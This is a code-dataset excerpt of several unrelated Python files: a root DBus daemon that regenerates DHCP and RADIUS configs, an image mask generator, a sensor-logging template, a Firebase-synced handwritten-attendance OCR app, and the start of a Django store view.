---\" % (time.time() - start_time))\n'''\n","sub_path":"interactivity/python/vanGogh1.py","file_name":"vanGogh1.py","file_ext":"py","file_size_in_byte":55078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596959173","text":"\"\"\"\nDeputy daemon that provides a service via DBus for performing privileged\noperations.\n\nSome operations, such as generating configuration files, sending signals to\nother processes etc. needs certain privileges. The Deputy service runs as root\nand provides a very simple service over DBus.\n\"\"\"\nimport contextlib\nimport io\nimport logging\nimport os\nimport pwd\nimport re\nimport stat\nimport string\nimport subprocess\nimport textwrap\nfrom functools import partial\nfrom typing import Iterable, Tuple\n\nimport netaddr\nimport pkg_resources\n# noinspection PyPackageRequirements\nfrom gi.repository import GLib\nfrom pydbus import SystemBus\nfrom pydbus.bus import Bus\nfrom sqlalchemy import null\nfrom sqlalchemy.pool import StaticPool\n\nfrom hades import constants\nfrom hades.common import db\nfrom hades.common.dbus import handle_glib_error\nfrom hades.common.privileges import dropped_privileges\nfrom hades.config.loader import Config, get_config\n\nlogger = logging.getLogger(__name__)\nauth_dhcp_pwd = pwd.getpwnam(constants.AUTH_DHCP_USER)\ndatabase_pwd = pwd.getpwnam(constants.DATABASE_USER)\nradius_pwd = pwd.getpwnam(constants.RADIUS_USER)\n\n\ndef reload_systemd_unit(bus: Bus, unit: str, timeout: int = 100) -> None:\n \"\"\"\n Instruct systemd to reload a given unit.\n :param bus: A DBus Bus\n :param unit: The name of the systemd unit\n :param timeout: Timeout in milliseconds\n \"\"\"\n logger.debug(\"Instructing systemd to reload unit %s\", unit)\n try:\n systemd = bus.get('org.freedesktop.systemd1', timeout=timeout)\n manager_interface = systemd['org.freedesktop.systemd1.Manager']\n manager_interface.ReloadUnit(unit, 'fail', timeout=timeout)\n except GLib.Error as e:\n handle_glib_error(e)\n\n\ndef restart_systemd_unit(bus: Bus, unit: str, timeout: int = 100) -> None:\n \"\"\"\n Instruct systemd to restart a given unit.\n :param bus: A DBus Bus\n :param unit: The name of the systemd unit\n :param timeout: Timeout in milliseconds\n \"\"\"\n logger.debug(\"Instructing systemd to restart unit %s\", unit)\n try:\n systemd = bus.get('org.freedesktop.systemd1', timeout=timeout)\n manager_interface = systemd['org.freedesktop.systemd1.Manager']\n manager_interface.RestartUnit(unit, 'fail', timeout=timeout)\n except GLib.Error as e:\n handle_glib_error(e)\n\n\ndef generate_dhcp_host_reservations(\n hosts: Iterable[Tuple[netaddr.EUI, netaddr.IPAddress]]\n) -> Iterable[str]:\n for mac, ip in hosts:\n mac = netaddr.EUI(mac)\n mac.dialect=netaddr.mac_unix_expanded\n yield \"{0},{1}\\n\".format(mac, ip)\n\n\ndef generate_dhcp_hosts_file(\n hosts: Iterable[Tuple[netaddr.EUI, netaddr.IPAddress]]\n) -> None:\n file_name = constants.AUTH_DHCP_HOSTS_FILE\n logger.info(\"Generating DHCP hosts file %s\", file_name)\n try:\n with open(file_name, mode='w', encoding='ascii') as f:\n fd = f.fileno()\n os.fchown(fd, auth_dhcp_pwd.pw_uid, auth_dhcp_pwd.pw_gid)\n os.fchmod(fd, stat.S_IRUSR | stat.S_IRGRP)\n f.writelines(generate_dhcp_host_reservations(hosts))\n except OSError as e:\n logger.error(\"Error writing %s: %s\", file_name, e.strerror)\n\n\ndef generate_ipset_swap(ipset_name: str, tmp_ipset_name: str,\n ips: Iterable[netaddr.IPAddress]) -> Iterable[str]:\n yield 'create {} hash:ip -exist\\n'.format(tmp_ipset_name)\n yield 'flush {}\\n'.format(tmp_ipset_name)\n yield from map(partial('add {} {}\\n'.format, tmp_ipset_name), ips)\n yield 'swap {} {}\\n'.format(ipset_name, tmp_ipset_name)\n yield 'destroy {}\\n'.format(tmp_ipset_name)\n\n\ndef update_alternative_dns_ipset(ips: Iterable[netaddr.IPAddress]) -> None:\n conf = get_config()\n ipset_name = conf['HADES_AUTH_DNS_ALTERNATIVE_IPSET']\n tmp_ipset_name = 'tmp_' + ipset_name\n logger.info(\"Updating alternative_dns ipset (%s)\", ipset_name)\n commands = io.TextIOWrapper(io.BytesIO(), 'ascii')\n commands.writelines(generate_ipset_swap(ipset_name, tmp_ipset_name, ips))\n commands.flush()\n subprocess.run(\n [constants.IP, 'netns', 'exec', 'auth', constants.IPSET, 'restore'],\n input=commands.buffer.getvalue())\n\n\ndef generate_radius_clients(\n clients: Iterable[Tuple[str, str, str, int, str, str, str, str]]\n) -> Iterable[str]:\n escape_pattern = re.compile(r'([\"\\\\])')\n replacement = r'\\\\\\1'\n\n template = string.Template(textwrap.dedent(\"\"\"\n client $shortname {\n shortname = \"$shortname\"\n ipaddr = \"$nasname\"\n secret = \"$secret\"\n require_message_authenticator = no\n nastype = $type\n coa_server = \"$shortname\"\n }\n home_server $shortname {\n type = coa\n ipaddr = \"$nasname\"\n port = 3799\n secret = \"$secret\"\n coa {\n irt = 2\n mrt = 16\n mrc = 5\n mrd = 30\n }\n }\n \"\"\"))\n for shortname, nasname, type, ports, secret, server, community, description in clients:\n yield template.substitute(\n shortname=shortname, nasname=nasname, type=type, ports=ports,\n secret=escape_pattern.sub(replacement, secret), community=community,\n description=description)\n\n\ndef generate_radius_clients_file(\n clients: Iterable[Tuple[str, str, str, int, str, str, str, str]]\n) -> None:\n logger.info(\"Generating freeRADIUS clients configuration\")\n file_name = constants.RADIUS_CLIENTS_FILE\n try:\n with open(file_name, mode='w', encoding='ascii') as f:\n fd = f.fileno()\n os.fchown(fd, radius_pwd.pw_uid, radius_pwd.pw_gid)\n os.fchmod(fd, stat.S_IRUSR | stat.S_IRGRP)\n f.writelines(generate_radius_clients(clients))\n except OSError as e:\n logger.exception(\"Error writing %s: %s\", file_name, e.strerror)\n\n\nclass HadesDeputyService(object):\n dbus = pkg_resources.resource_string(\n __package__, 'interface.xml').decode('utf-8')\n\n def __init__(self, bus: Bus, config: Config):\n self.bus = bus\n self.config = config\n self.engine = db.create_engine(config, poolclass=StaticPool)\n original_creator = self.engine.pool._creator\n\n def creator(connection_record=None):\n \"\"\"Create a connection as the database user\"\"\"\n with dropped_privileges(database_pwd):\n connection = original_creator(connection_record)\n return connection\n\n self.engine.pool._creator = creator\n\n def Refresh(self, force: bool):\n \"\"\"\n Refresh the materialized views.\n If necessary depended config files are regenerate and the corresponding\n services are reloaded.\n \"\"\"\n logger.info(\"Refreshing materialized views\")\n with contextlib.closing(self.engine.connect()) as connection:\n with connection.begin():\n db.refresh_materialized_view(connection, db.radcheck)\n db.refresh_materialized_view(connection, db.radreply)\n db.refresh_materialized_view(connection, db.radgroupcheck)\n db.refresh_materialized_view(connection, db.radgroupreply)\n db.refresh_materialized_view(connection, db.radusergroup)\n if force:\n with connection.begin():\n db.refresh_materialized_view(connection, db.dhcphost)\n db.refresh_materialized_view(connection, db.nas)\n db.refresh_materialized_view(connection, db.alternative_dns)\n logger.info(\"Forcing reload of DHCP hosts, NAS clients and \"\n \"alternative DNS clients\")\n reload_dhcp_host = True\n reload_nas = True\n reload_alternative_dns = True\n hosts = db.get_all_dhcp_hosts(connection)\n clients = db.get_all_nas_clients(connection)\n ips = db.get_all_alternative_dns_ips(connection)\n else:\n dhcphost_diff = db.refresh_and_diff_materialized_view(\n connection, db.dhcphost, db.temp_dhcphost, [null()])\n if dhcphost_diff != ([], [], []):\n logger.info('DHCP host reservations changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, dhcphost_diff))\n hosts = db.get_all_dhcp_hosts(connection)\n reload_dhcp_host = True\n else:\n reload_dhcp_host = False\n\n nas_diff = db.refresh_and_diff_materialized_view(\n connection, db.nas, db.temp_nas, [null()])\n\n if nas_diff != ([], [], []):\n logger.info('RADIUS clients changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, nas_diff))\n clients = db.get_all_nas_clients(connection)\n reload_nas = True\n else:\n reload_nas = False\n\n alternative_dns_diff = db.refresh_and_diff_materialized_view(\n connection, db.alternative_dns, db.temp_alternative_dns,\n [null()])\n\n if alternative_dns_diff != ([], [], []):\n logger.info('Alternative auth DNS clients changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, alternative_dns_diff))\n ips = db.get_all_alternative_dns_ips(connection)\n reload_alternative_dns = True\n else:\n reload_alternative_dns = False\n\n if reload_dhcp_host:\n generate_dhcp_hosts_file(hosts)\n reload_systemd_unit(self.bus, 'hades-auth-dhcp.service')\n if reload_nas:\n generate_radius_clients_file(clients)\n restart_systemd_unit(self.bus, 'hades-radius.service')\n if reload_alternative_dns:\n update_alternative_dns_ipset(ips)\n return \"OK\"\n\n def Cleanup(self):\n \"\"\"\n Clean up old records in the radacct and radpostauth tables.\n :return: \n \"\"\"\n logger.info(\"Cleaning up old records\")\n interval = self.config.HADES_RETENTION_INTERVAL\n with contextlib.closing(self.engine.connect()) as connection:\n db.delete_old_sessions(connection, interval)\n db.delete_old_auth_attempts(connection, interval)\n return \"OK\"\n\n\ndef run_event_loop():\n bus = SystemBus()\n logger.debug('Publishing interface %s on DBus', constants.DEPUTY_DBUS_NAME)\n config = get_config()\n bus.publish(constants.DEPUTY_DBUS_NAME, HadesDeputyService(bus, config))\n loop = GLib.MainLoop()\n loop.run()\n","sub_path":"src/hades/deputy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"503004693","text":"\"\"\"\nMIT License\n\nCopyright (c) 2020 Max Planck Institute of Molecular Physiology\n\nAuthor: Luca Lusnig (luca.lusnig@mpi-dortmund.mpg.de)\nAuthor: Thorsten Wagner (thorsten.wagner@mpi-dortmund.mpg.de)\nAuthor: Markus Stabrin (markus.stabrin@mpi-dortmund.mpg.de)\nAuthor: Fabian Schoenfeld (fabian.schoenfeld@mpi-dortmund.mpg.de)\nAuthor: Tapu Shaikh (tapu.shaikh@mpi-dortmund.mpg.de)\nAuthor: Adnan Ali (adnan.ali@mpi-dortmund.mpg.de)\n\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n\nfrom math import pi\nimport functools\nimport scipy.ndimage\nfrom numpy import zeros,add,repeat,arange,tile,reshape,multiply,divide,exp,fft,moveaxis,asarray\n\n\"\"\"\nI copied the following functions from https://github.com/MPI-Dortmund/LineEnhancer/blob/master/lineenhancer/line_enhancer.py\nThorsten.wagner committed 7 Sep 2018 1 parent 7f54d3d commit d8adf43b63568598c6df34b0fa6e4e67e0083733 \n\"\"\"\n\n\"\"\" order of the spline interpolation in scipy.ndimage for BICUBIC interpolation \"\"\"\nBICUBIC=3 #https://stackoverflow.com/questions/13242382/resampling-a-numpy-array-representing-an-image\n\nclass MaskStackCreator:\n\n def __init__(self, filament_width, mask_size, mask_width, angle_step, interpolation_order = BICUBIC, bright_background=False):\n self._filament_width = filament_width\n self._mask_size = mask_size\n self._mask_width = mask_width\n self._mask_stack = None\n self._mask_fft_stack = None\n self._angle_step = angle_step\n self._interpolation_order = interpolation_order\n self._bright_background = bright_background #in the java code it used 't' in 'generateMask'\n\n def get_mask_stack(self):\n return self._mask_stack\n\n def get_mask_fft_stack(self):\n\n # Only calculate it once!\n if self._mask_fft_stack is not None:\n return self._mask_fft_stack\n\n self.init()\n\n return self._mask_fft_stack\n\n def init(self):\n mask = self.calculate_mask(self._mask_size, self._filament_width, self._mask_width)\n self._mask_fft_stack = self.calculate_fourier_mask_stack_vectorized(mask, self._angle_step)\n\n def set_interpolation_order(self, order):\n self._interpolation_order = order\n\n def get_angle_step(self):\n return self._angle_step\n\n def get_mask_size(self):\n return self._mask_size\n\n ''' this is the original function\n def calculate_mask(self, mask_size, filament_width, mask_width):\n mask = np.zeros(shape=(mask_size, mask_size))\n\n x0 = mask_size / 2.0 + 0.5\n y0 = mask_size / 2.0 + 0.5\n\n sigmax = mask_width / 2.355 # full width at half maximum\n varx = sigmax * sigmax\n sigmay = filament_width / 2.355\n vary = sigmay * sigmay\n\n background_factor = 1.0\n if self._bright_background:\n background_factor = -1.0\n for i in range(0, mask_size):\n for j in range(0, mask_size):\n y = j + 0.5\n x = i + 0.5\n value = background_factor * np.pi * sigmax * (vary - np.power(y - y0, 2)) / (2 * vary * sigmay) * np.exp(\n -1.0 * (np.power(x - x0, 2) / (2 * varx) + np.power(y - y0, 2) / (2 * vary)))\n if np.sqrt((y - y0) ** 2 + (x - x0) ** 2) > 300:\n value = 0\n mask[j, i] = value\n return mask\n '''\n\n ''' I adapted this function to match with the 'FilamentEnhancer->MaskCreator_.java' class '''\n def calculate_mask(self,mask_size, filamentwidth, maskwidth ):\n \"\"\"\n It is used to return a maskinstead of the FilamentEnhancer->MaskCreator_.java class\n the parameter 't' is now the 'self._bright_background\n :param mask_size:\n :param filamentwidth:\n :param maskwidth:\n :return:\n \"\"\"\n mask = zeros((mask_size, mask_size), dtype=float)\n\n x0 = mask_size / 2 + 0.5\n y0 = mask_size / 2 + 0.5\n sigmax = maskwidth / 2.355 # Full width at half maximum\n varx = sigmax * sigmax\n sigmay = filamentwidth / 2.355\n vary = sigmay * sigmay\n\n index_x = repeat(arange(mask_size), mask_size)\n index_y = tile(arange(mask_size), mask_size)\n pow_index_x0 = zeros((mask_size, mask_size), dtype=float)\n pow_indey_y0 = zeros((mask_size, mask_size), dtype=float)\n res_exp = zeros((mask_size, mask_size), dtype=float)\n\n if self._bright_background is False:\n index_y = reshape(index_y, (mask_size, mask_size)) + 0.5\n index_x = reshape(index_x, (mask_size, mask_size)) + 0.5\n indey_y0 = reshape(index_y, (mask_size, mask_size)) - y0\n index_x0 = reshape(index_x, (mask_size, mask_size)) - x0\n multiply(index_x0, index_x0, out=pow_index_x0)\n multiply(indey_y0, indey_y0, out=pow_indey_y0)\n\n val = zeros((mask_size, mask_size), dtype=float)\n divide(multiply(-1.0 * pi * sigmax, vary - pow_indey_y0), 2 * vary * sigmay, out=val)\n val_exp = (divide(pow_index_x0, 2 * varx) + divide(pow_indey_y0, 2 * vary)) * -1\n exp(val_exp, out=res_exp)\n multiply(val, res_exp, out=mask)\n else:\n indey_y0 = reshape(index_y, (mask_size, mask_size)) - y0\n index_x0 = reshape(index_x, (mask_size, mask_size)) - x0\n\n multiply(index_x0, index_x0, out=pow_index_x0)\n multiply(indey_y0, indey_y0, out=pow_indey_y0)\n\n val_exp = (divide(pow_index_x0, 2 * varx) + divide(pow_indey_y0, 2 * vary)) * -1\n\n exp(val_exp, out=res_exp)\n multiply(index_x0, res_exp, out=mask)\n\n value_to_add = -mask[0, 0]\n add(mask, value_to_add, out=mask)\n\n \"\"\"\n the 'fp' is the 'mask' var in the java code\n The following code is useless because it comments the multiply step\n // Normalize\n \t\tdouble sum = 0;\n \t\tfor(int x = 0; x < fp.getWidth(); x++){\n \t\t\tfor(int y = 0; y < fp.getHeight(); y++){\n \t\t\t\tsum += fp.getf(x, y);\n \t\t\t}\n \t\t}\n \t\tdouble scale = 1.0/sum;\n \t\t//fp.multiply(scale);\n \"\"\"\n return mask\n\n def rotate_and_fft(self, mask, angle):\n rot_mask = scipy.ndimage.interpolation.rotate(mask, angle, reshape=False, order=self._interpolation_order)\n return rot_mask\n\n\n def calculate_fourier_mask_stack_vectorized(self, mask, angle_step):\n\n # calculate the fft for each rotation of the mask\n # return a list of complex arrays\n\n angle_steps = range(0, 180, angle_step)\n # pool = multiprocessing.Pool()\n result = list(map(functools.partial(self.rotate_and_fft, mask), angle_steps))\n self._mask_stack = asarray(result)\n result_fft = fft.rfft2(self._mask_stack,axes=(-2,-1))\n\n result_fft = moveaxis(result_fft, 0, 2)\n\n return result_fft\n\n\n\n\n\n","sub_path":"stripper/maskStackCreator.py","file_name":"maskStackCreator.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405361581","text":"#!/usr/bin/python\n#coding = utf-8\n\nimport time, sys, datetime, logging, os, commands\nimport Adafruit_DHT\nfrom influxdb import InfluxDBClient\nimport collectionModule\n\n# workarea, which is necessary\nworkarea = 'Defaultdir'\nsys.path.append(workarea)\n\n# import the parameters\nfrom Parameters import Paras_coll\n\ndef main():\n\n num_sensors = len( Paras_coll.sensor_gpios )\n\n for n in range( num_sensors ):\n tempt_sensor = collectionModule.Collection(\n Paras_coll.measurements[n],\n Paras_coll.sensor, \n Paras_coll.sensor_gpios[n], \n Paras_coll.outputs[n]\n )\n\n tempt_sensor.run_collection()\n\nmain()\n","sub_path":"Setup/Templates/temp_runCollection.py","file_name":"temp_runCollection.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649254463","text":"import numpy as np\nimport cv2\nimport firebase_admin\nfrom firebase_admin import credentials,firestore\n# from firebase_admin import storage\nimport pyrebase\nimport urllib\nimport urlopen\nimport keras\nimport math\nfrom firebase import Firebase\nfrom google.oauth2 import service_account\nimport openpyxl\nfrom datetime import date\nfrom PIL import Image\nimport firebase\nfrom scipy import ndimage\nimport argparse\nimport imutils\nimport orientation1\nimport segmentation\nimport os\nfrom google.cloud import storage\nimport google.auth.transport.requests\nfrom google.auth.transport.requests import AuthorizedSession\n\ndef getBestShift(img):\n cy,cx = ndimage.measurements.center_of_mass(img)\n\n rows,cols = img.shape\n shiftx = np.round(cols/2.0-cx).astype(int)\n shifty = np.round(rows/2.0-cy).astype(int)\n\n return shiftx,shifty\ndef shift(img,sx,sy):\n rows,cols = img.shape\n M = np.float32([[1,0,sx],[0,1,sy]])\n shifted = cv2.warpAffine(img,M,(cols,rows))\n return shifted\n\ndef preprocess(x):\n \n while np.sum(x[0]) == 0:\n x = x[1:]\n\n while np.sum(x[:,0]) == 0:\n x = np.delete(x,0,1)\n\n while np.sum(x[-1]) == 0:\n x = x[:-1]\n\n while np.sum(x[:,-1]) == 0:\n x = np.delete(x,-1,1)\n\n rows,cols = x.shape\n if rows > cols:\n factor = 20.0/rows\n rows = 20\n cols = int(round(cols*factor))\n x = cv2.resize(x, (cols,rows))\n else:\n factor = 20.0/cols\n cols = 20\n rows = int(round(rows*factor))\n x = cv2.resize(x, (cols, rows))\n colsPadding = (int(math.ceil((28-cols)/2.0)),int(math.floor((28-cols)/2.0)))\n rowsPadding = (int(math.ceil((28-rows)/2.0)),int(math.floor((28-rows)/2.0)))\n x = np.lib.pad(x,(rowsPadding,colsPadding),'constant')\n shiftx,shifty = getBestShift(x)\n shifted = shift(x,shiftx,shifty)\n x = shifted\n return x\n\ndef order_points(pts):\n\t# initialzie a list of coordinates that will be ordered\n\t# such that the first entry in the list is the top-left,\n\t# the second entry is the top-right, the third is the\n\t# bottom-right, and the fourth is the bottom-left\n\trect = np.zeros((4, 2), dtype = \"float32\")\n \n\t# the top-left point will have the smallest sum, whereas\n\t# the bottom-right point will have the largest sum\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\t# now, compute the difference between the points, the\n\t# top-right point will have the smallest difference,\n\t# whereas the bottom-left will have the largest difference\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\ndef four_point_transform(image, pts):\n\t# obtain a consistent order of the points and unpack them\n\t# individually\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n \n\t# compute the width of the new image, which will be the\n\t# maximum distance between bottom-right and bottom-left\n\t# x-coordiates or the top-right and top-left x-coordinates\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\t# compute the height of the new image, which will be the\n\t# maximum distance between the top-right and bottom-right\n\t# y-coordinates or the top-left and bottom-left y-coordinates\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n \n\t# now that we have the dimensions of the new image, construct\n\t# the set of destination points to obtain a \"birds eye view\",\n\t# (i.e. top-down view) of the image, again specifying points\n\t# in the top-left, top-right, bottom-right, and bottom-left\n\t# order\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n # initialize the dimensions of the image to be resized and\n # grab the image size\n dim = None\n (h, w) = image.shape[:2]\n\n # if both the width and height are None, then return the\n # original image\n if width is None and height is None:\n return image\n\n # check to see if the width is None\n if width is None:\n # calculate the ratio of the height and construct the\n # dimensions\n r = height / float(h)\n dim = (int(w * r), height)\n\n # otherwise, the height is None\n else:\n # calculate the ratio of the width and construct the\n # dimensions\n r = width / float(w)\n dim = (width, int(h * r))\n\n # resize the image\n resized = cv2.resize(image, dim, interpolation = inter)\n\n # return the resized image\n return resized\ndef get_contour_precedence(contour, cols):\n origin = cv2.boundingRect(contour)\n return origin[1] * cols + origin[0]\n\n\n\nconfig= {\n\t\"apiKey\": \"AIzaSyDYHyTfB4u_OswwN507ql9kXx5sdedXZEg\",\n\t\"project_id\": \"attendance-app-1c683\",\n\t\"authDomain\": \"attendance-app-1c683.firebaseapp.com\",\n\t\"storageBucket\": \"attendance-app-1c683.appspot.com\",\n\t\"databaseURL\" : \"https://attendance-app-1c683.firebaseio.com\",\n\t\"messagingSenderId\": \"522004839232\"\n}\n\ndef main():\n\tfirebase =Firebase(config)\n\tdb=firebase.database()\n\twhile(True):\n\t\tusers=db.child(\"uploads\").child(\"abc\").child(\"a\").get()\n\t\tif users.val()!=None:\n\t\t\turllib.request.urlretrieve(str(users.val()),\"test.jpg\")\n\t\t\tbreak\n\tdb.child(\"uploads\").remove()\n\n\tnew_model = keras.models.load_model('cnn.h5')\n\n\ttry:\n\t\t# read image\n\t\timg = cv2.imread('test.jpg')\n\t\timg=image_resize(img,width=800,height=700)\n\t\timage=orientation1.angle(img)\n\t\tgray=image\n\t\tret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n\t\tkernel = np.ones((5,100), np.uint8)\n\t\timg_dilation = cv2.dilate(thresh, kernel, iterations=1)\n\t\t# cv2.imshow('dilated',img_dilation)\n\t\t# cv2.waitKey(0)\n\t\t# cv2.imwrite('dilated.jpg', img_dilation) \n\t\t#find contours\n\t\t_,ctrs, hier = cv2.findContours(img_dilation.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\t\t#sort contours\n\t\tsorted_ctrs = sorted(ctrs, key=lambda ctr: (cv2.boundingRect(ctr)[0],cv2.boundingRect(ctr)[1]))\n\t\toutput=[]\n\t\tfor i, ctr in enumerate(sorted_ctrs):\n\t\t\t# Get bounding box\n\t\t\tx, y, w, h = cv2.boundingRect(ctr)\n\n\t\t\t# Getting ROI\n\t\t\troi = image[y:y+h, x:x+w]\n\t\t\tarea=w*h\n\n\t\t\tif h 10 and 100 < w < 500 and area < 12000 :\n\t\t\t\tgrayy= roi\n\t\t\t\t# roi=image_resize(roi,width=100,height=30)\n\t\t\t\t# cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),1)\n\t\t\t\tret,threshh = cv2.threshold(grayy,127,255,cv2.THRESH_BINARY_INV)\n\t\t\t\t# cv2.imshow('inner',threshh)\n\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t# cv2.imwrite('word.jpg', threshh) \n\t\t\t\t_,ctrss, hierr = cv2.findContours(threshh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\t\t\t\tsorted_ctrss = sorted(ctrss, key=lambda ctr: cv2.boundingRect(ctr)[0])\n\t\t\t\tnum=0\n\t\t\t\tfor ii, ctrr in enumerate(sorted_ctrss):\n\t\t\t\t\t# Get bounding box\n\t\t\t\t\txx, yy, ww, hh = cv2.boundingRect(ctrr)\n\n\t\t\t\t\t# Getting ROI\n\t\t\t\t\troii = roi[yy-2:yy+hh+2, xx-1:xx+ww+1]\n\t\t\t\t\tif 1 < ww and 4 < hh :\n\t\t\t\t\t\t# cv2.imshow('wer ',roii)\n\t\t\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t\t\t# cv2.rectangle(img,(xx,yy),(xx+ww,yy+hh),(0,255,0),1)\n\n\t\t\t\t\t\t# cv2.imwrite('single.jpg', roii) \n\t\t\t\t\t\tpic=image_resize(roii,width=28,height=28)\n\n\t\t\t\t\t\t(thresh, pic) = cv2.threshold(pic, 120, 255, cv2.THRESH_BINARY_INV)\n\t\t\t\t\t\tpic=preprocess(pic)\n\t\t\t\t\t\t# cv2.imshow('inner',pic)\n\t\t\t\t\t\t# cv2.waitKey(0)\n\t\t\t\t\t\t# cv2.imwrite('singlemnist.jpg', pic) \n\t\t\t\t\t\tpic=np.array(pic).reshape(28,28,1)\n\t\t\t\t\t\tpic=np.expand_dims(pic,axis=0) \n\t\t\t\t\t\tprediction=new_model.predict(pic)\n\t\t\t\t\t\tx=np.argmax(prediction)\n\t\t\t\t\t\tnum=num*10+x\n\t\t\t\toutput.append(num)\n\t\toutput.sort()\n\t\tfile=open(\"output.txt\",\"w+\")\n\t\tfor i in output:\n\t\t\tfile.write(str(i))\n\t\t\tfile.write('\\n')\n\t\tfile.close()\n\t\t#entering attendence in sheet\n\t\t# cv2.imwrite('final.jpg',img)\n\t\tloc=(\"/home/pankaj/Desktop/minor/attendence.xlsx\")\n\t\twb1 = openpyxl.load_workbook(loc) \n\t\tws1 = wb1.worksheets[0] \n\t\twb2=openpyxl.Workbook()\n\t\tws2=wb2.active\n\t\tnrow=ws1.max_row\n\t\tncol=ws1.max_column\n\t\tfor i in range(1,200):\n\t\t\tc1=ws1.cell(row=i,column=1)\n\t\t\tif not c1.value:\n\t\t\t\tnrow=i\n\t\t\t\tbreak\n\t\tfor i in range(1,200):\n\t\t\tc1=ws1.cell(row=1,column=i)\n\t\t\tif not c1.value:\n\t\t\t\tncol=i\n\t\t\t\tbreak\n\t\tprint(ncol)\n\t\tfor i in range(1,nrow):\n\t\t\tfor j in range(1,ncol):\n\t\t\t\tcopyfrom=ws1.cell(row=i,column=j)\n\t\t\t\tws2.cell(row=i,column=j).value=copyfrom.value\n\t\tncol=ncol\n\t\ttoday=date.today()\n\t\ttoday=today.strftime(\"%m/%d/%Y\")\n\t\tc1=ws2.cell(row=1,column=ncol)\n\t\tc1.value=today\n\t\tfor i in range(2,nrow+1):\n\t\t\tc1=ws2.cell(row=i,column=2)\n\t\t\t# flag=0\n\t\t\tfor j in range(len(output)):\n\t\t\t\tif c1.value == output[j]:\n\t\t\t\t\tws2.cell(row=i,column=ncol).value=\"P\"\n\n\t\tfor i in range(2,nrow):\n\t\t\tc1=ws2.cell(row=i,column=ncol)\n\t\t\tif not c1.value:\n\t\t\t\tc1.value=\"A\"\n\t\t#if attendence if of same day reject\n\t\tif ws2.cell(row=1,column=ncol).value == ws2.cell(row=1,column=ncol-1).value:\n\t\t\tws2.delete_cols(ncol)\n\t\twb2.save(\"/home/pankaj/Desktop/minor/attendence.xlsx\")\n\texcept:\n\t\tprint(\"error occured\")\n\t\treturn\n\tstorage=firebase.storage()\n\tstorage.child(\"attendence.xlsx\").put(\"attendence.xlsx\")\n\n\treturn\nif __name__ == '__main__':\n\tfirebase =Firebase(config)\n\tdb=firebase.database()\n\tdb.child(\"uploads\").remove()\n\twhile(True):\n\t\tmain()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"626202785","text":"# stores/view.py\r\n\r\nfrom django.shortcuts import redirect,render\r\n#from django.forms.models import modelform_factory\r\nfrom .forms import StoreForm\r\nfrom .models import Store\r\n\r\n#from django.http import HttpResponse\r\n\r\n# Create your views here.\r\n\r\ndef store_list(request):\r\n\tstores = Store.objects.all()\r\n\treturn render(request, 'stores/store_list.html', {'stores': stores})\r\n\r\ndef store_detail(request, pk):\r\n try:\r\n store = Store.objects.get(pk=pk)\r\n except Store.DoesNotExist:\r\n raise Http404\r\n return render(request, 'stores/store_detail.html', {'store': store})\r\n\t\r\ndef store_create(request):\r\n #StoreForm = modelform_factory(Store, fields=('name', 'notes',))\r\n if request.method == 'POST':\r\n form = 